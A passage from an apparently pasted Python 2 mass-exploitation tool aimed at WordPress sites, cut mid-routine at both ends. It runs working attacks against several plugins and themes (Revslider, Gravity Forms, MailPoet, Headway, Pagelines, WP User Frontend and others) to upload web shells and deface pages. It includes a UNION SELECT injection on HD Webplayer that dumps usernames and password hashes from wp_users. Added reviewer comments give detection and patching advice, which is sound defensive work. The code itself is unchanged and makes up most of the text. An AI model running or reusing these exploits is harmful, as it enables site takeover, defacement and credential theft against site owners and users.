  1388. + self.pagelinesExploitShell.split('/')[1]
  1389. GoT = requests.get(Shell, timeout=5)
  1390. if GoT.status_code == 200:
  1391. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1392. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1393. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1394. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1395. with open('result/Shell_results.txt', 'a') as writer:
  1396. writer.write(site + '/wp-content/vuln.php' + '\n')
  1397. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1398. self.Print_Vuln_index(site + '/vuln.htm')
  1399. with open('result/Index_results.txt', 'a') as writer:
  1400. writer.write(site + '/vuln.htm' + '\n')
  1401. else:
  1402. self.Print_NotVuln('cherry plugin', site)
  1403. else:
  1404. self.Print_NotVuln('cherry plugin', site)
  1405. except:
  1406. self.Print_NotVuln('cherry plugin', site)
  1407.  
  1408. def addblockblocker(self, site):
        # POSTs self.pagelinesExploitShell as form field 'popimg' to the
        # admin-ajax.php action 'getcountryuser', then requests the file from the
        # current month's uploads directory and checks /wp-content/vuln.php and
        # /vuln.htm for the marker 'Vuln!!'. The failure messages name the target
        # as 'Adblock Blocker'.
        #
        # NOTE(review): indentation was lost in this paste; the if/else pairing
        # below is inferred, not shown.
        #
        # Defender note: admin-ajax.php is reachable without login, so a handler
        # registered for anonymous users must do its own authorisation and
        # file-type checks. Look for multipart POSTs to
        # /wp-admin/admin-ajax.php?action=getcountryuser and for .php files under
        # /wp-content/uploads/<year>/<month>/; the uploads tree should never
        # execute PHP.
  1409. try:
  1410. ShellFile = {'popimg': open(self.pagelinesExploitShell, 'rb')}
  1411. Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
  1412. requests.post(Exp, files=ShellFile, timeout=5)
        # self.year / self.month are set once in __init__ with time.strftime, so
        # the path is the year/month at the time the tool was started.
  1413. CheckShell = 'http://' + site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/' \
  1414. + self.pagelinesExploitShell.split('/')[1]
  1415. GoT = requests.get(CheckShell, timeout=5)
  1416. if GoT.status_code == 200:
        # CheckShell is rebound here from a URL string to a response object.
  1417. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1418. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1419. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1420. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1421. with open('result/Shell_results.txt', 'a') as writer:
  1422. writer.write(site + '/wp-content/vuln.php' + '\n')
  1423. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1424. self.Print_Vuln_index(site + '/vuln.htm')
  1425. with open('result/Index_results.txt', 'a') as writer:
  1426. writer.write(site + '/vuln.htm' + '\n')
  1427. else:
  1428. self.Print_NotVuln('Adblock Blocker', site)
  1429. else:
  1430. self.Print_NotVuln('Adblock Blocker', site)
  1431. except:
  1432. self.Print_NotVuln('Adblock Blocker', site)
  1433.  
  1434. def HeadWayThemeExploit(self, site):
        # Fetches the home page of `site`, and if it references a theme path
        # starting with /wp-content/themes/headway, POSTs
        # self.pagelinesExploitShell as 'Filedata' to that theme's
        # library/visual-editor/lib/upload-header.php. It then requests the file
        # under /wp-content/uploads/headway/header-uploads/ and checks
        # /wp-content/vuln.php and /vuln.htm for the marker 'Vuln!!'.
        #
        # NOTE(review): indentation was lost in this paste; the if/else pairing
        # below is inferred, not shown.
        #
        # Defender note: the theme directory name is read from the public HTML,
        # so hiding the theme name is not a control. What matters is whether
        # upload-header.php accepts a request with no session. Look for POSTs to
        # .../library/visual-editor/lib/upload-header.php and for non-image files
        # in the header-uploads directory; update the theme and disable PHP
        # execution under /wp-content/uploads/.
  1435. try:
  1436. CheckTheme = requests.get('http://' + site, timeout=5)
  1437. if '/wp-content/themes/headway' in CheckTheme.text.encode('utf-8'):
        # The greedy (.*) takes everything between the first
        # '/wp-content/themes/' and the last '/style.css' on a line.
  1438. ThemePath = re.findall('/wp-content/themes/(.*)/style.css', CheckTheme.text.encode('utf-8'))
  1439. ShellFile = {'Filedata': open(self.pagelinesExploitShell, 'rb')}
  1440. useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1441.  
  1442. url = "http://" + site + "/wp-content/themes/" + ThemePath[0] +\
  1443. "/library/visual-editor/lib/upload-header.php"
  1444. Check = requests.get(url, timeout=5)
  1445. if Check.status_code == 200:
  1446. GoT = requests.post(url, files=ShellFile, headers=useragent)
  1447. if GoT.status_code == 200:
  1448. Shell_URL = 'http://' + site + '/wp-content/uploads/headway/header-uploads/' +\
  1449. self.pagelinesExploitShell.split('/')[1]
        # The response to this request is discarded; only the follow-up marker
        # checks decide the outcome.
  1450. requests.get(Shell_URL, timeout=5)
  1451. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1452. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1453. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1454. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1455. with open('result/Shell_results.txt', 'a') as writer:
  1456. writer.write(site + '/wp-content/vuln.php' + '\n')
  1457. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1458. self.Print_Vuln_index(site + '/vuln.htm')
  1459. with open('result/Index_results.txt', 'a') as writer:
  1460. writer.write(site + '/vuln.htm' + '\n')
  1461. else:
  1462. self.Print_NotVuln('Headway Theme', site)
  1463. else:
  1464. self.Print_NotVuln('Headway Theme', site)
  1465. else:
  1466. self.Print_NotVuln('Headway Theme', site)
  1467. else:
  1468. self.Print_NotVuln('Headway Theme', site)
  1469. except:
  1470. self.Print_NotVuln('Headway Theme', site)
  1471.  
  1472.  
  1473. def pagelinesExploit(self, site):
        # POSTs self.pagelinesExploitShell as 'file' to /wp-admin/admin-post.php
        # together with the fields settings_upload=settings and page=pagelines,
        # then checks /wp-content/vuln.php and /vuln.htm for the marker 'Vuln!!'.
        #
        # NOTE(review): indentation was lost in this paste; the if/else pairing
        # below is inferred, not shown.
        #
        # Defender note: the request carries no login cookie or nonce, so it only
        # has an effect where the theme's settings-import handler runs before any
        # capability check. Look for anonymous multipart POSTs to admin-post.php
        # with page=pagelines; update the theme and verify that settings import
        # requires an authenticated administrator.
  1474. try:
  1475. FileShell = {'file': open(self.pagelinesExploitShell, 'rb')}
  1476. PostData = {'settings_upload': "settings", 'page': "pagelines"}
  1477. Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1478. url = "http://" + site + "/wp-admin/admin-post.php"
  1479. GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=5)
        # A 200 on the POST is not treated as success by itself; the marker
        # checks below decide.
  1480. if GoT.status_code == 200:
  1481. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1482. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1483. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1484. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1485. with open('result/Shell_results.txt', 'a') as writer:
  1486. writer.write(site + '/wp-content/vuln.php' + '\n')
  1487. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1488. self.Print_Vuln_index(site + '/vuln.htm')
  1489. with open('result/Index_results.txt', 'a') as writer:
  1490. writer.write(site + '/vuln.htm' + '\n')
  1491. else:
  1492. self.Print_NotVuln('Pagelines', site)
  1493. else:
  1494. self.Print_NotVuln('Pagelines', site)
  1495. except:
  1496. self.Print_NotVuln('Pagelines', site)
  1497.  
  1498.  
  1499. def wysijaExploit(self, site):
        # POSTs the archive self.MailPoetZipShell as 'my-theme' to the wysija
        # (MailPoet) theme-upload action on admin-post.php, then requests
        # vuln.php and pwn.gif under /wp-content/uploads/wysija/themes/rock/ and
        # records whichever is served.
        #
        # NOTE(review): indentation was lost in this paste; the if/else pairing
        # below is inferred, not shown.
        #
        # Defender note: the upload is sent without a session. The server-side
        # flaw this relies on is a theme-upload action that runs on admin-post.php
        # before the caller's capability is checked, combined with archive
        # extraction into a web-served directory. Look for POSTs to
        # admin-post.php?page=wysija_campaigns&action=themes from clients with no
        # prior login, and for .php files under /wp-content/uploads/wysija/themes/.
        # Update the plugin and deny PHP execution under /wp-content/uploads/.
  1500. try:
  1501. FileShell = {'my-theme': open(self.MailPoetZipShell, 'rb')}
  1502. PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
  1503. 'page': 'GZNeFLoZAb'}
  1504. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1505. url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
  1506. GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
        # The HTML-escaped reload link in the response is used as the sign that
        # the upload action ran.
  1507. if 'page=wysija_campaigns&amp;action=themes&amp;reload=1' in GoT.text.encode('utf-8'):
  1508. sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
  1509. index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
  1510. CheckShell = requests.get(sh, timeout=5)
  1511. CheckIndex = requests.get(index, timeout=5)
  1512. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1513. self.Print_vuln_Shell(site + '/wp-content/uploads/wysija/themes/rock/vuln.php')
  1514. with open('result/Shell_results.txt', 'a') as writer:
  1515. writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
  1516. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1517. self.Print_Vuln_index(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif')
  1518. with open('result/Index_results.txt', 'a') as writer:
  1519. writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
  1520. else:
  1521. self.Print_NotVuln('wysija', site)
  1522. else:
  1523. self.Print_NotVuln('wysija', site)
  1524. except:
  1525. self.Print_NotVuln('wysija', site)
  1526.  
  1527.  
  1528.  
  1529. def HD_WebPlayerSqli(self, site):
        # Requests the HD Webplayer plugin's playlist.php on `site`; if it returns
        # XML, sends a second request whose `videoid` parameter carries a
        # UNION SELECT against wp_users, reads the second <title> element of the
        # response and splits it on ':' into a login name and the user_pass
        # column value. Both are printed and appended to result/Sqli_result.txt.
        #
        # Defender note: this is SQL injection through a numeric query parameter.
        # The server-side fix is to cast `videoid` to an integer or bind it as a
        # parameter rather than concatenating it into the query. In access logs
        # the request is a GET to .../hd-webplayer/playlist.php whose query string
        # contains `union+select` and `wp_users`. If such requests appear in logs
        # for a site running the plugin, treat the stored password hashes as
        # disclosed and force password resets, then remove or update the plugin.
        # The query also assumes the default `wp_` table prefix.
  1530. try:
  1531. check = requests.get('http://' + site + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=5)
  1532. if '<?xml version="' in check.text.encode('utf-8'):
  1533. Exploit = '/wp-content/plugins/hd-webplayer/playlist.php' \
  1534. '?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass)' \
  1535. ',4,5,6,7,8,9,10,11+from+wp_users--'
  1536. GoT = requests.get('http://' + site + Exploit, timeout=5)
  1537. User_Pass = re.findall('<title>(.*)</title>', GoT.text.encode('utf-8'))
        # Index 1 is the second <title> match; an IndexError here falls through to
        # the bare except and is reported as "not vulnerable".
  1538. username = User_Pass[1].split(':')[0]
  1539. password = User_Pass[1].split(':')[1]
  1540. self.Print_Vuln('HD-Webplayer', site)
  1541. self.Print_Username_Password(username, password)
  1542. with open('result/Sqli_result.txt', 'a') as writer:
  1543. writer.write('------------------------------' + '\n' + 'Domain: ' + site + '\n' +
  1544. 'Username : ' + username + '\n' + 'Password : ' + password + '\n')
  1545. else:
  1546. self.Print_NotVuln('HD-Webplayer', site)
  1547. except:
  1548. self.Print_NotVuln('HD-Webplayer', site)
  1549.  
  1550.  
  1551. def Gravity_Forms_Shell(self, site):
        # Probes /?gf_page=upload on `site`; if the reply contains
        # '"status" : "error"', POSTs the local file self.gravShell with
        # gform_unique_id set to a '../' sequence and name 'css.php5', then looks
        # for the marker 'Vuln!!' at /wp-content/_input_3_css.php5,
        # /wp-content/vuln.php and /vuln.htm. Most failure branches hand over to
        # self.Gravity_forms_Index(site).
        #
        # NOTE(review): indentation was lost in this paste; the nesting of the
        # inner try/except and the if/else pairing are inferred, not shown.
        # NOTE(review): self.gravShell is assigned outside the part of the file
        # visible here.
        #
        # Defender note: two weaknesses are combined -- a path-traversal value in
        # `gform_unique_id`, which moves the stored file out of the intended upload
        # directory, and an extension filter that does not cover `.php5`. Look for
        # POSTs to /?gf_page=upload whose body contains '../' in gform_unique_id,
        # and for files named `_input_<n>_*` in /wp-content/ or the web root.
        # Update the plugin, reject traversal sequences and validate uploads
        # against an allow-list of extensions, and make sure the web server does
        # not map .php5 (or other alternate extensions) to the PHP handler.
  1552. try:
  1553. Grav_checker = requests.get('http://' + site + '/?gf_page=upload', timeout=5)
  1554. if '"status" : "error"' in Grav_checker.text.encode('utf-8'):
  1555. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1556. fileDeface = {'file': open(self.gravShell, 'rb')}
  1557. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'css.php5'}
  1558. try:
  1559. url = "http://" + site + '/?gf_page=upload'
  1560. GoT = requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
  1561. if '.php5' in GoT.text.encode('utf-8'):
        # The stored name is the prefix '_input_' + field_id + '_' followed by the
        # submitted name, as the URL below shows.
  1562. CheckShell = requests.get('http://' + site + '/wp-content/_input_3_css.php5', timeout=5)
  1563. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1564. Checkshell2 = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1565. if 'Vuln!!' in Checkshell2.text.encode('utf-8'):
        # Same URL as Checkshell2 is fetched a second time here.
  1566. Checkshell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1567. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1568. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  1569. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1570. with open('result/Shell_results.txt', 'a') as writer:
  1571. writer.write(site + '/wp-content/vuln.php' + '\n')
  1572. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1573. self.Print_Vuln_index(site + '/vuln.htm')
  1574. with open('result/Index_results.txt', 'a') as writer:
  1575. writer.write(site + '/vuln.htm' + '\n')
  1576. else:
  1577. self.Gravity_forms_Index(site)
  1578. else:
  1579. self.Gravity_forms_Index(site)
  1580. else:
  1581. self.Gravity_forms_Index(site)
  1582. else:
  1583. self.Gravity_forms_Index(site)
        # Python 2 exception syntax; `e` is bound but not used.
  1584. except Exception, e:
  1585. self.Print_NotVuln('Gravity-Forms', site)
  1586. else:
  1587. self.Print_NotVuln('Gravity Forms', site)
  1588. except:
  1589. self.Timeout(site)
  1590.  
  1591.  
  1592. def Gravity_forms_Index(self, site):
        # Image-only variant of the Gravity Forms routine: POSTs
        # self.Jce_Deface_image to /?gf_page=upload twice, with gform_unique_id
        # set to four and then five '../' segments and name 'pwn.gif', and checks
        # whether the file is served from the web root or from /wp-content/.
        #
        # NOTE(review): indentation was lost in this paste; the extent of the
        # `try` body and the if/elif/else pairing are inferred, not shown.
        #
        # Defender note: the payload here is an image, so an extension filter
        # alone does not stop it; the flaw exercised is the path traversal in
        # `gform_unique_id`, which lets an anonymous client place a file outside
        # the upload directory. Look for '../' in that field in POST bodies to
        # /?gf_page=upload and for unexpected `_input_<n>_*` files in the web root
        # or /wp-content/. Update the plugin.
  1593. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
        # The file is opened before the try block, so a missing local file raises
        # to the caller instead of being reported as "not vulnerable".
  1594. fileDeface = {'file': open(self.Jce_Deface_image, 'rb')}
  1595. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'pwn.gif'}
  1596. post_data2 = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'pwn.gif'}
  1597. try:
  1598. url = "http://" + site + '/?gf_page=upload'
  1599. requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
  1600. requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5)
  1601. CheckIndex = requests.get('http://' + site + '/_input_3_pwn.gif', timeout=5)
  1602. CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_pwn.gif', timeout=5)
  1603. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1604. self.Print_Vuln_index(site + '/_input_3_pwn.gif')
  1605. with open('result/Index_results.txt', 'a') as writer:
  1606. writer.write(site + '/_input_3_pwn.gif' + '\n')
  1607. elif 'GIF89a' in CheckIndex2.text.encode('utf-8'):
  1608. self.Print_Vuln_index(site + '/wp-content/_input_3_pwn.gif')
  1609. with open('result/Index_results.txt', 'a') as writer:
  1610. writer.write(site + '/wp-content/_input_3_pwn.gif' + '\n')
  1611. else:
  1612. self.Print_NotVuln('Gravity-Forms', site)
  1613. except Exception, e:
  1614. self.Print_NotVuln('Gravity-Forms', site)
  1615.  
  1616. def WP_User_Frontend(self, site):
        # Probes the admin-ajax.php action 'wpuf_file_upload' on `site`, POSTs
        # self.Jce_Deface_image as 'wpuf_file', and checks whether the file is
        # served from the current month's uploads directory.
        #
        # NOTE(review): indentation was lost in this paste; the nesting of the
        # inner try/except and the if/else pairing are inferred, not shown.
        #
        # Defender note: the upload is sent with no session, so it only lands
        # where the plugin registers this AJAX action for logged-out visitors
        # without checking a nonce or capability. Look for anonymous multipart
        # POSTs to /wp-admin/admin-ajax.php with action=wpuf_file_upload, and audit
        # /wp-content/uploads/<year>/<month>/ for files no editor uploaded. Update
        # the plugin.
  1617. try:
  1618. CheckVuln = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=wpuf_file_upload', timeout=5)
        # Either condition is enough: the word 'error' in the body, or any 200.
  1619. if 'error' in CheckVuln.text or CheckVuln.status_code == 200:
  1620. post = {}
  1621. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1622. post['action'] = 'wpuf_file_upload'
  1623. files = {'wpuf_file': open(self.Jce_Deface_image, 'rb')}
  1624. try:
  1625. _url = 'http://' + site + "/wp-admin/admin-ajax.php"
  1626. _open = requests.post(_url, files=files, data=post, headers=UserAgent, timeout=10)
  1627. if 'image][]' in _open.text.encode('utf-8'):
        # self.year / self.month are fixed in __init__, so this is the year/month
        # at tool start-up.
  1628. _Def = site + "/wp-content/uploads/20" + self.year + "/" + self.month + "/" + self.Jce_Deface_image.split('/')[1]
  1629. Check_Deface = requests.get('http://' + _Def, timeout=5)
  1630. if 'GIF89a' in Check_Deface.text.encode('utf-8'):
  1631. self.Print_Vuln_index(_Def)
  1632. with open('result/Index_results.txt', 'a') as writer:
  1633. writer.write(_Def + '\n')
  1634. else:
  1635. self.Print_NotVuln('WP-User-Frontend', site)
  1636. else:
  1637. self.Print_NotVuln('WP-User-Frontend', site)
  1638. except:
  1639. self.Print_NotVuln('WP-User-Frontend', site)
  1640. else:
  1641. self.Print_NotVuln('WP-User-Frontend', site)
  1642. except:
  1643. self.Print_NotVuln('WP-User-Frontend', site)
  1644.  
  1645.  
  1646. def Revslider_css(self, site):
        # POSTs a block of HTML as the 'data' field of the revslider AJAX action
        # 'update_captions_css' and, if the reply contains 'succesfully', records
        # the matching get_captions_css URL in result/Index_results.txt.
        #
        # NOTE(review): indentation was lost in this paste; the extent of the
        # `try` body is inferred, not shown.
        #
        # Defender note: this is a state-changing AJAX action called with no
        # session or nonce; the stored caption CSS is overwritten with the
        # submitted markup. Look for POSTs to /wp-admin/admin-ajax.php with
        # action=revslider_ajax_action and client_action=update_captions_css from
        # clients that never logged in, and compare the get_captions_css output
        # with the expected stylesheet. Update the plugin, including copies bundled
        # inside themes.
  1647. IndeXText = 'Vuln!! Patch it Now!'
  1648. ency = {'action': "revslider_ajax_action",
  1649. 'client_action': "update_captions_css",
  1650. 'data': "<body style='color: transparent;background-color: black'><center><h1>"
  1651. "<b style='color: white'>" + IndeXText + "<p style='color: transparent'>",
  1652.  
  1653. }
  1654. try:
  1655. url = "http://" + site + "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
  1656. aa = requests.post(url, data=ency, timeout=5)
        # The misspelling 'succesfully' is the literal string being matched in
        # the response; it is not a typo in this check.
  1657. if 'succesfully' in aa.text.encode('utf-8'):
  1658. deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
  1659. self.Print_Vuln_index(deface)
  1660. with open('result/Index_results.txt', 'a') as writer:
  1661. writer.write(deface + '\n')
  1662. else:
  1663. self.Print_NotVuln('Revslider', site)
  1664. except:
  1665. self.Print_NotVuln('Revslider', site)
  1666.  
  1667. def Revslider_SHELL(self, site):
        # Fetches the home page of `site` and picks one branch according to which
        # plugin or theme path appears in the HTML (the standalone revslider
        # plugin, or one of several themes that ship their own copy). Every branch
        # does the same thing: POST the archive self.MailPoetZipShell to
        # admin-ajax.php as the revslider 'update_plugin' action, request pwn.gif
        # and vuln.php from that copy's temp/update_extract/ directory, record
        # what is served, and call self.Revslider_Config(site).
        #
        # NOTE(review): indentation was lost in this paste, so the nesting of the
        # if/elif/else chain and of the calls to Revslider_Config inside each
        # branch is inferred from order only -- confirm against an indented copy.
        #
        # Defender note: the POST carries no session or nonce, so it only has an
        # effect where the plugin's update action is reachable by logged-out
        # visitors. The branches show why updating the standalone plugin is not
        # enough: themes bundle their own revslider copy under their own path, and
        # each copy has to be updated or removed. Look for anonymous POSTs to
        # /wp-admin/admin-ajax.php with action=revslider_ajax_action and
        # client_action=update_plugin, and for any file under a
        # .../revslider/temp/update_extract/ directory; deny PHP execution there.
  1668. try:
  1669. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  1670. Exploit = 'http://' + site + '/wp-admin/admin-ajax.php'
  1671. data = {'action': "revslider_ajax_action", 'client_action': "update_plugin"}
  1672. FileShell = {'update_file': open(self.MailPoetZipShell, 'rb')}
  1673. CheckRevslider = requests.get('http://' + site, timeout=5)
        # Branch selection is by substring match on the public home page HTML.
  1674. if '/wp-content/plugins/revslider/' in CheckRevslider.text.encode('utf-8'):
  1675. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1676. CheckRev = requests.get('http://' + site +
  1677. '/wp-content/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
        # 'GIF89a' is the GIF header; 'Vuln!!' is the marker expected from
        # vuln.php.
  1678. if 'GIF89a' in CheckRev.text.encode('utf-8'):
  1679. ShellCheck = requests.get('http://' + site +
  1680. '/wp-content/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1681. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1682. self.Print_vuln_Shell(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php')
  1683. with open('result/Shell_results.txt', 'a') as writer:
  1684. writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1685. self.Print_Vuln_index(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif')
  1686. with open('result/Index_results.txt', 'a') as writer:
  1687. writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1688. self.Revslider_Config(site)
  1689. else:
  1690. self.Revslider_Config(site)
  1691. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
  1692. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1693. CheckRev1 = requests.get('http://' + site +
  1694. '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1695. if 'GIF89a' in CheckRev1.text.encode('utf-8'):
  1696. ShellCheck = requests.get('http://' + site +
  1697. '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1698. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1699. self.Print_vuln_Shell(
  1700. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php')
  1701. with open('result/Shell_results.txt', 'a') as writer:
  1702. writer.write(
  1703. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1704. self.Print_Vuln_index(
  1705. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1706. with open('result/Index_results.txt', 'a') as writer:
  1707. writer.write(
  1708. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1709. self.Revslider_Config(site)
  1710. else:
  1711. self.Revslider_Config(site)
  1712. elif '/wp-content/themes/striking_r/' in CheckRevslider.text.encode('utf-8'):
  1713. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1714. CheckRev2 = requests.get('http://' + site +
  1715. '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1716. if 'GIF89a' in CheckRev2.text.encode('utf-8'):
  1717. ShellCheck = requests.get('http://' + site +
  1718. '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1719. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1720. self.Print_vuln_Shell(
  1721. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php')
  1722. with open('result/Shell_results.txt', 'a') as writer:
  1723. writer.write(
  1724. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1725. self.Print_Vuln_index(
  1726. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1727. with open('result/Index_results.txt', 'a') as writer:
  1728. writer.write(
  1729. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1730. self.Revslider_Config(site)
  1731. else:
  1732. self.Revslider_Config(site)
  1733. elif '/wp-content/themes/IncredibleWP/' in CheckRevslider.text.encode('utf-8'):
  1734. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1735. CheckRev3 = requests.get('http://' + site +
  1736. '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1737. if 'GIF89a' in CheckRev3.text.encode('utf-8'):
  1738. ShellCheck = requests.get('http://' + site +
  1739. '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1740. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1741. self.Print_vuln_Shell(
  1742. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php')
  1743. with open('result/Shell_results.txt', 'a') as writer:
  1744. writer.write(
  1745. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1746. self.Print_Vuln_index(
  1747. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1748. with open('result/Index_results.txt', 'a') as writer:
  1749. writer.write(
  1750. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1751. self.Revslider_Config(site)
  1752. else:
  1753. self.Revslider_Config(site)
  1754. elif '/wp-content/themes/ultimatum/' in CheckRevslider.text.encode('utf-8'):
  1755. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1756. CheckRev4 = requests.get('http://' + site +
  1757. '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1758. if 'GIF89a' in CheckRev4.text.encode('utf-8'):
  1759. ShellCheck = requests.get('http://' + site +
  1760. '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1761. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1762. self.Print_vuln_Shell(
  1763. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php')
  1764. with open('result/Shell_results.txt', 'a') as writer:
  1765. writer.write(
  1766. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1767. self.Print_Vuln_index(
  1768. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif')
  1769. with open('result/Index_results.txt', 'a') as writer:
  1770. writer.write(
  1771. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1772. self.Revslider_Config(site)
  1773. else:
  1774. self.Revslider_Config(site)
  1775. elif '/wp-content/themes/medicate/' in CheckRevslider.text.encode('utf-8'):
  1776. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
  1777. CheckRev5 = requests.get('http://' + site +
  1778. '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif', timeout=5)
  1779. if 'GIF89a' in CheckRev5.text.encode('utf-8'):
